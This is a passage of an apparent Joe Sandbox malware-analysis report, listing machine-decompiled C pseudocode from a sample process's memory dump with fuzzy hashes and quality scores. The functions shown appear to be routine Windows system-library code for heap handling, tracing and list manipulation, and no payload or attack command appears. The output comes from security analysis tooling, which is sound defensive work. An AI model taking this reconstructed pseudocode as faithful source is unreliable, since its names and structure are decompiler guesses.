                    					_t52 =  *(_t61 + 0x5c);
                    					_t11 = _t61 + 0x78; // 0x78
                    					_t34 = E01699702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                    					_t24 = _t34 | 0xffffffff;
                    					asm("lock xadd [esi], eax");
                    					if((_t34 | 0xffffffff) == 0) {
                    						 *0x175b1e0(_t61);
                    						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                    					}
                    					goto L7;
                    				}
                    				L4:
                    				_t31 = 0x7ffe0386;
                    				goto L5;
                    			}





















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 82b5ac4a0fb0fd74880f9664b857056fb9f09c8658238faf69a0cfedc32d138b
                    • Instruction ID: cfa331619420440de8cdb1b562088d2c4c954ce83b55c7d70408439ec5d03622
                    • Opcode Fuzzy Hash: 82b5ac4a0fb0fd74880f9664b857056fb9f09c8658238faf69a0cfedc32d138b
                    • Instruction Fuzzy Hash: 1D318E31201B04CFD722DB28CC44B66B7E5FF89714F144A6DE59A87790DB75A806CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E016E6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                    				signed short* _v8;
                    				signed char _v12;
                    				void* _t22;
                    				signed char* _t23;
                    				intOrPtr _t24;
                    				signed short* _t44;
                    				void* _t47;
                    				signed char* _t56;
                    				signed char* _t58;
                    
                    				_t48 = __ecx;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t44 = __ecx;
                    				_v12 = __edx;
                    				_v8 = __ecx;
                    				_t22 = E01687D50();
                    				_t58 = 0x7ffe0384;
                    				if(_t22 == 0) {
                    					_t23 = 0x7ffe0384;
                    				} else {
                    					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    				}
                    				if( *_t23 != 0) {
                    					_t24 =  *0x1757b9c; // 0x0
                    					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                    					_t23 = L01684620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                    					_t56 = _t23;
                    					if(_t56 != 0) {
                    						_t56[0x24] = _a4;
                    						_t56[0x28] = _a8;
                    						_t56[6] = 0x1420;
                    						_t56[0x20] = _v12;
                    						_t14 =  &(_t56[0x2c]); // 0x2c
                    						E016AF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                    						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                    						if(E01687D50() != 0) {
                    							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    						}
                    						_push(_t56);
                    						_push(_t47 - 0x20);
                    						_push(0x402);
                    						_push( *_t58 & 0x000000ff);
                    						E016A9AE0();
                    						_t23 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                    					}
                    				}
                    				return _t23;
                    			}













                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e0797e510d3fd1c56d28258c615d0a4ee73a24d76e98810361fd8ba75a36374
                    • Instruction ID: 09a406ee402bb2babd956298717b06720a50159b411cfb640691660797663b9a
                    • Opcode Fuzzy Hash: 5e0797e510d3fd1c56d28258c615d0a4ee73a24d76e98810361fd8ba75a36374
                    • Instruction Fuzzy Hash: D5219A72A00645ABD715DF68DC84E2AB7E8FF58700F1401A9F904CB790D734ED50CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E016A90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                    				intOrPtr* _v0;
                    				void* _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				char _v36;
                    				void* _t38;
                    				intOrPtr _t41;
                    				void* _t44;
                    				signed int _t45;
                    				intOrPtr* _t49;
                    				signed int _t57;
                    				signed int _t58;
                    				intOrPtr* _t59;
                    				void* _t62;
                    				void* _t63;
                    				void* _t65;
                    				void* _t66;
                    				signed int _t69;
                    				intOrPtr* _t70;
                    				void* _t71;
                    				intOrPtr* _t72;
                    				intOrPtr* _t73;
                    				char _t74;
                    
                    				_t65 = __edx;
                    				_t57 = _a4;
                    				_t32 = __ecx;
                    				_v8 = __edx;
                    				_t3 = _t32 + 0x14c; // 0x14c
                    				_t70 = _t3;
                    				_v16 = __ecx;
                    				_t72 =  *_t70;
                    				while(_t72 != _t70) {
                    					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                    						L24:
                    						_t72 =  *_t72;
                    						continue;
                    					}
                    					_t30 = _t72 + 0x10; // 0x10
                    					if(E016BD4F0(_t30, _t65, _t57) == _t57) {
                    						return 0xb7;
                    					}
                    					_t65 = _v8;
                    					goto L24;
                    				}
                    				_t61 = _t57;
                    				_push( &_v12);
                    				_t66 = 0x10;
                    				if(E0169E5E0(_t57, _t66) < 0) {
                    					return 0x216;
                    				}
                    				_t73 = L01684620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                    				if(_t73 == 0) {
                    					_t38 = 0xe;
                    					return _t38;
                    				}
                    				_t9 = _t73 + 0x10; // 0x10
                    				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                    				E016AF3E0(_t9, _v8, _t57);
                    				_t41 =  *_t70;
                    				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                    					_t62 = 3;
                    					asm("int 0x29");
                    					_push(_t62);
                    					_push(_t57);
                    					_push(_t73);
                    					_push(_t70);
                    					_t71 = _t62;
                    					_t74 = 0;
                    					_v36 = 0;
                    					_t63 = E0169A2F0(_t62, _t71, 1, 6,  &_v36);
                    					if(_t63 == 0) {
                    						L20:
                    						_t44 = 0x57;
                    						return _t44;
                    					}
                    					_t45 = _v12;
                    					_t58 = 0x1c;
                    					if(_t45 < _t58) {
                    						goto L20;
                    					}
                    					_t69 = _t45 / _t58;
                    					if(_t69 == 0) {
                    						L19:
                    						return 0xe8;
                    					}
                    					_t59 = _v0;
                    					do {
                    						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                    							goto L18;
                    						}
                    						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                    						 *_t59 = _t49;
                    						if( *_t49 != 0x53445352) {
                    							goto L18;
                    						}
                    						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                    						return 0;
                    						L18:
                    						_t63 = _t63 + 0x1c;
                    						_t74 = _t74 + 1;
                    					} while (_t74 < _t69);
                    					goto L19;
                    				}
                    				 *_t73 = _t41;
                    				 *((intOrPtr*)(_t73 + 4)) = _t70;
                    				 *((intOrPtr*)(_t41 + 4)) = _t73;
                    				 *_t70 = _t73;
                    				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                    				return 0;
                    			}



























                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                    • Instruction ID: 1ec49a2479c8391b71f3efd63904d97bb1e47160c491dc49dadd3e4a02819ff7
                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                    • Instruction Fuzzy Hash: AF217F71A01205EFDB21DF59CC44AAAFBF8EB54354F24886EE949A7300D330AD40CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E01693B7A(void* __ecx) {
                    				signed int _v8;
                    				char _v12;
                    				intOrPtr _v20;
                    				intOrPtr _t17;
                    				intOrPtr _t26;
                    				void* _t35;
                    				void* _t38;
                    				void* _t41;
                    				intOrPtr _t44;
                    
                    				_t17 =  *0x17584c4; // 0x0
                    				_v12 = 1;
                    				_v8 =  *0x17584c0 * 0x4c;
                    				_t41 = __ecx;
                    				_t35 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x17584c0 * 0x4c);
                    				if(_t35 == 0) {
                    					_t44 = 0xc0000017;
                    				} else {
                    					_push( &_v8);
                    					_push(_v8);
                    					_push(_t35);
                    					_push(4);
                    					_push( &_v12);
                    					_push(0x6b);
                    					_t44 = E016AAA90();
                    					_v20 = _t44;
                    					if(_t44 >= 0) {
                    						E016AFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x17584c0 * 0xc);
                    						_t38 = _t35;
                    						if(_t35 < _v8 + _t35) {
                    							do {
                    								asm("movsd");
                    								asm("movsd");
                    								asm("movsd");
                    								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                    							} while (_t38 < _v8 + _t35);
                    							_t44 = _v20;
                    						}
                    					}
                    					_t26 =  *0x17584c4; // 0x0
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                    				}
                    				return _t44;
                    			}













                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a14d6ea8d3a9d3b58a439b4c3999e8e786306e96dcd5098edd9e3ebd4fbff5ab
                    • Instruction ID: 87c21b1a015b9c1b97254ea28c9032ecf3a1b2b44c5ba729d5485444c2d30c29
                    • Opcode Fuzzy Hash: a14d6ea8d3a9d3b58a439b4c3999e8e786306e96dcd5098edd9e3ebd4fbff5ab
                    • Instruction Fuzzy Hash: DE21A472A00515EFCB10DF98CD81F6ABBBDFB44718F154169EA04AB251D771ED01CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E016E6CF0(void* __edx, intOrPtr _a4, short _a8) {
                    				char _v8;
                    				char _v12;
                    				char _v16;
                    				char _v20;
                    				char _v28;
                    				char _v36;
                    				char _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed char* _t21;
                    				void* _t24;
                    				void* _t36;
                    				void* _t38;
                    				void* _t46;
                    
                    				_push(_t36);
                    				_t46 = __edx;
                    				_v12 = 0;
                    				_v8 = 0;
                    				_v20 = 0;
                    				_v16 = 0;
                    				if(E01687D50() == 0) {
                    					_t21 = 0x7ffe0384;
                    				} else {
                    					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                    				}
                    				if( *_t21 != 0) {
                    					_t21 =  *[fs:0x30];
                    					if((_t21[0x240] & 0x00000004) != 0) {
                    						if(E01687D50() == 0) {
                    							_t21 = 0x7ffe0385;
                    						} else {
                    							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                    						}
                    						if(( *_t21 & 0x00000020) != 0) {
                    							_t56 = _t46;
                    							if(_t46 == 0) {
                    								_t46 = 0x1645c80;
                    							}
                    							_push(_t46);
                    							_push( &_v12);
                    							_t24 = E0169F6E0(_t36, 0, _t46, _t56);
                    							_push(_a4);
                    							_t38 = _t24;
                    							_push( &_v28);
                    							_t21 = E0169F6E0(_t38, 0, _t46, _t56);
                    							if(_t38 != 0) {
                    								if(_t21 != 0) {
                    									E016E7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                    									L01682400( &_v52);
                    								}
                    								_t21 = L01682400( &_v28);
                    							}
                    						}
                    					}
                    				}
                    				return _t21;
                    			}




















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26231e70f4ae73df55f118f686b97144b8c49ab7617d7d732dc67705a3d29ab0
                    • Instruction ID: bd3f4a0bd10a8f194da1a1fa21f3648a1ff64675023bc59df2e3146ccd09ec46
                    • Opcode Fuzzy Hash: 26231e70f4ae73df55f118f686b97144b8c49ab7617d7d732dc67705a3d29ab0
                    • Instruction Fuzzy Hash: 6D2134734023499BD711EF2CCD48B6BBBECEFA1240F04065AFA40CB251E731C948C6A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E0173070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                    				char _v8;
                    				intOrPtr _v11;
                    				signed int _v12;
                    				intOrPtr _v15;
                    				signed int _v16;
                    				intOrPtr _v28;
                    				void* __ebx;
                    				char* _t32;
                    				signed int* _t38;
                    				signed int _t60;
                    
                    				_t38 = __ecx;
                    				_v16 = __edx;
                    				_t60 = E017307DF(__ecx, __edx,  &_a4,  &_a8, 2);
                    				if(_t60 != 0) {
                    					_t7 = _t38 + 0x38; // 0x29cd5903
                    					_push( *_t7);
                    					_t9 = _t38 + 0x34; // 0x6adeeb00
                    					_push( *_t9);
                    					_v12 = _a8 << 0xc;
                    					_t11 = _t38 + 4; // 0x5de58b5b
                    					_push(0x4000);
                    					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                    					E0172AFDE( &_v8,  &_v12);
                    					E01731293(_t38, _v28, _t60);
                    					if(E01687D50() == 0) {
                    						_t32 = 0x7ffe0380;
                    					} else {
                    						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    					}
                    					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                    						_t21 = _t38 + 0x3c; // 0xc3595e5f
                    						E017214FB(_t38,  *_t21, _v11, _v15, 0xd);
                    					}
                    				}
                    				return  ~_t60;
                    			}














                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                    • Instruction ID: 276bb7402d0a7a3e44a17d8de656c57b3e9ba9cb17c3a0c3e8305a76e95e9f09
                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                    • Instruction Fuzzy Hash: 762104362042009FDB16DF1CC884B6ABBA5EFD4350F048669F9958B386D730D91ACB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E016E7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _t21;
                    				void* _t24;
                    				intOrPtr _t25;
                    				void* _t36;
                    				short _t39;
                    				signed char* _t42;
                    				unsigned int _t46;
                    				void* _t50;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t21 =  *0x1757b9c; // 0x0
                    				_t46 = _a8;
                    				_v12 = __edx;
                    				_v8 = __ecx;
                    				_t4 = _t46 + 0x2e; // 0x2e
                    				_t36 = _t4;
                    				_t24 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                    				_t50 = _t24;
                    				if(_t50 != 0) {
                    					_t25 = _a4;
                    					if(_t25 == 5) {
                    						L3:
                    						_t39 = 0x14b1;
                    					} else {
                    						_t39 = 0x14b0;
                    						if(_t25 == 6) {
                    							goto L3;
                    						}
                    					}
                    					 *((short*)(_t50 + 6)) = _t39;
                    					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                    					_t11 = _t50 + 0x2c; // 0x2c
                    					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                    					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                    					E016AF3E0(_t11, _a12, _t46);
                    					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                    					if(E01687D50() == 0) {
                    						_t42 = 0x7ffe0384;
                    					} else {
                    						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    					}
                    					_push(_t50);
                    					_t19 = _t36 - 0x20; // 0xe
                    					_push(0x403);
                    					_push( *_t42 & 0x000000ff);
                    					E016A9AE0();
                    					_t24 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                    				}
                    				return _t24;
                    			}














                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bc26c9b849465c4b898c87c753cd224c8c2c72e00c3240351f82088918ca30c9
                    • Instruction ID: 4e878a055872c4be749957639061e26a6f136d1990e6a4d6915e6cb40fcf735d
                    • Opcode Fuzzy Hash: bc26c9b849465c4b898c87c753cd224c8c2c72e00c3240351f82088918ca30c9
                    • Instruction Fuzzy Hash: 7921A172501604ABC725DF69DC94EABBBE9EF48340F10466DF60AC7750D734E900CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E0168AE73(intOrPtr __ecx, void* __edx) {
                    				intOrPtr _v8;
                    				void* _t19;
                    				char* _t22;
                    				signed char* _t24;
                    				intOrPtr _t25;
                    				intOrPtr _t27;
                    				void* _t31;
                    				intOrPtr _t36;
                    				char* _t38;
                    				signed char* _t42;
                    
                    				_push(__ecx);
                    				_t31 = __edx;
                    				_v8 = __ecx;
                    				_t19 = E01687D50();
                    				_t38 = 0x7ffe0384;
                    				if(_t19 != 0) {
                    					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    				} else {
                    					_t22 = 0x7ffe0384;
                    				}
                    				_t42 = 0x7ffe0385;
                    				if( *_t22 != 0) {
                    					if(E01687D50() == 0) {
                    						_t24 = 0x7ffe0385;
                    					} else {
                    						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    					}
                    					if(( *_t24 & 0x00000010) != 0) {
                    						goto L17;
                    					} else {
                    						goto L3;
                    					}
                    				} else {
                    					L3:
                    					_t27 = E01687D50();
                    					if(_t27 != 0) {
                    						_t27 =  *[fs:0x30];
                    						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                    					}
                    					if( *_t38 != 0) {
                    						_t27 =  *[fs:0x30];
                    						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                    							goto L5;
                    						}
                    						_t27 = E01687D50();
                    						if(_t27 != 0) {
                    							_t27 =  *[fs:0x30];
                    							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                    						}
                    						if(( *_t42 & 0x00000020) != 0) {
                    							L17:
                    							_t25 = _v8;
                    							_t36 = 0;
                    							if(_t25 != 0) {
                    								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                    							}
                    							_t27 = E016E7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                    						}
                    						goto L5;
                    					} else {
                    						L5:
                    						return _t27;
                    					}
                    				}
                    			}














                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                    • Instruction ID: f055571bf1de8dead7520b6425b551abeb06da7b91593d2d703afec92ab97bcf
                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                    • Instruction Fuzzy Hash: 1421F632A017C1DFEB26AB6DCD58B257BE9EF44740F1905A9ED048B792D734DC42C690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0169FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				void* _t19;
                    				intOrPtr _t29;
                    				intOrPtr _t32;
                    				intOrPtr _t35;
                    				intOrPtr _t37;
                    				intOrPtr* _t40;
                    
                    				_t35 = __edx;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t37 = 0;
                    				_v8 = __edx;
                    				_t29 = __ecx;
                    				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                    					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                    					L3:
                    					_t19 = _a4 - 4;
                    					if(_t19 != 0) {
                    						if(_t19 != 1) {
                    							L7:
                    							return _t37;
                    						}
                    						if(_t35 == 0) {
                    							L11:
                    							_t37 = 0xc000000d;
                    							goto L7;
                    						}
                    						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                    							_t35 = _v8;
                    						}
                    						 *((intOrPtr*)(_t40 + 4)) = _t35;
                    						goto L7;
                    					}
                    					if(_t29 == 0) {
                    						goto L11;
                    					}
                    					_t32 =  *_t40;
                    					if(_t32 != 0) {
                    						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                    						E016776E2( *_t40);
                    					}
                    					 *_t40 = _t29;
                    					goto L7;
                    				}
                    				_t40 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                    				if(_t40 == 0) {
                    					_t37 = 0xc0000017;
                    					goto L7;
                    				}
                    				_t35 = _v8;
                    				 *_t40 = 0;
                    				 *((intOrPtr*)(_t40 + 4)) = 0;
                    				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                    				goto L3;
                    			}











                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                    • Instruction ID: 6a39a418f6f89ecf489c618e206fe1594852ca5881d2e04a0397e4eb51f15ed0
                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                    • Instruction Fuzzy Hash: E4217C72A00645DBDB31CF0DC940A66FBE9EB98A10F2681AEE955C7711D7319C01DB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E0169B390(void* __ecx, intOrPtr _a4) {
                    				signed int _v8;
                    				signed char _t12;
                    				signed int _t16;
                    				signed int _t21;
                    				void* _t28;
                    				signed int _t30;
                    				signed int _t36;
                    				signed int _t41;
                    
                    				_push(__ecx);
                    				_t41 = _a4 + 0xffffffb8;
                    				E01682280(_t12, 0x1758608);
                    				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                    				asm("sbb edi, edi");
                    				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                    				_v8 = _t36;
                    				asm("lock cmpxchg [ebx], ecx");
                    				_t30 = 1;
                    				if(1 != 1) {
                    					while(1) {
                    						_t21 = _t30 & 0x00000006;
                    						_t16 = _t30;
                    						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                    						asm("lock cmpxchg [edi], esi");
                    						if(_t16 == _t30) {
                    							break;
                    						}
                    						_t30 = _t16;
                    					}
                    					_t36 = _v8;
                    					if(_t21 == 2) {
                    						_t16 = E016A00C2(0x1758608, 0, _t28);
                    					}
                    				}
                    				if(_t36 != 0) {
                    					_t16 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                    				}
                    				return _t16;
                    			}












                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77b81deea14cf8d7ea34b4f0b0cabe9ce9aff626ac4a8be1a89290ba70f66dee
                    • Instruction ID: 96df68058817391cb8d89c985b849d40afd14a7e1f43f9e22122a5a4d3624719
                    • Opcode Fuzzy Hash: 77b81deea14cf8d7ea34b4f0b0cabe9ce9aff626ac4a8be1a89290ba70f66dee
                    • Instruction Fuzzy Hash: 0B116B337091109FCF19DA599D81A2BB25BEBC5330B25423DDD26C7380CE71AC02C695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E01669240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t33;
                    				intOrPtr _t37;
                    				intOrPtr _t41;
                    				intOrPtr* _t46;
                    				void* _t48;
                    				intOrPtr _t50;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr _t62;
                    				intOrPtr _t65;
                    				void* _t66;
                    				void* _t68;
                    
                    				_push(0xc);
                    				_push(0x173f708);
                    				E016BD08C(__ebx, __edi, __esi);
                    				_t65 = __ecx;
                    				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                    				if( *(__ecx + 0x24) != 0) {
                    					_push( *(__ecx + 0x24));
                    					E016A95D0();
                    					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                    				}
                    				L6();
                    				L6();
                    				_push( *((intOrPtr*)(_t65 + 0x28)));
                    				E016A95D0();
                    				_t33 =  *0x17584c4; // 0x0
                    				L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                    				_t37 =  *0x17584c4; // 0x0
                    				L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                    				_t41 =  *0x17584c4; // 0x0
                    				E01682280(L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x17586b4);
                    				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                    				_t46 = _t65 + 0xe8;
                    				_t62 =  *_t46;
                    				_t60 =  *((intOrPtr*)(_t46 + 4));
                    				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                    					_t61 = 3;
                    					asm("int 0x29");
                    					_push(_t65);
                    					_t66 = _t61;
                    					_t23 = _t66 + 0x14; // 0x8df8084c
                    					_push( *_t23);
                    					E016A95D0();
                    					_t24 = _t66 + 0x10; // 0x89e04d8b
                    					_push( *_t24);
                    					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                    					_t48 = E016A95D0();
                    					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                    					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                    					return _t48;
                    				} else {
                    					 *_t60 = _t62;
                    					 *((intOrPtr*)(_t62 + 4)) = _t60;
                    					 *(_t68 - 4) = 0xfffffffe;
                    					E01669325();
                    					_t50 =  *0x17584c4; // 0x0
                    					return E016BD0D1(L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                    				}
                    			}
















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ee6865fa7df489e583733cf9017740136f5f4e545b4841d756a23ac1d77d1385
                    • Instruction ID: 1e8cd6317fefc78f2243389f91272690ac9a1f4c3c5f34b59bd9022e073b68dc
                    • Opcode Fuzzy Hash: ee6865fa7df489e583733cf9017740136f5f4e545b4841d756a23ac1d77d1385
                    • Instruction Fuzzy Hash: FE213671040641DFC722EF68CE40B59B7FABF18718F14456CE449966A2CB74E941CB48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E016F4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                    				intOrPtr* _t18;
                    				intOrPtr _t24;
                    				intOrPtr* _t27;
